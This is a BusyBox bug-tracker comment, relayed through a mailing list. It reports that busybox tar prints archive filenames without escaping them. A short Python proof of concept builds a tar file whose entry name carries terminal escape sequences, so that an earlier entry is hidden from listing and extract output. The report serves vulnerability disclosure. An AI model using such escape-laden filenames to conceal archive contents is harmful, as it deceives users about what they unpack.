[Bug 16018] busybox tar allows un-escaped filenames to be printed to stdout/stderr
bugzilla at busybox.net
bugzilla at busybox.net
Wed Jun 19 21:56:16 UTC 2024
https://bugs.busybox.net/show_bug.cgi?id=16018
--- Comment #2 from Ian Norton <ian.norton at entrust.com> ---
The following python program demonstrates creating an archive with an entry
that can hide one or more previous entries from the list and verbose extract
output:
#!/usr/bin/env python3
import tarfile
with tarfile.open("bad.tar", "w") as tf:
tf.add(__file__, arcname="hidden.txt")
tf.add(__file__, arcname="\033[1A\033[1Ka-totally-innocent-filename.txt")
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the busybox-cvs
mailing list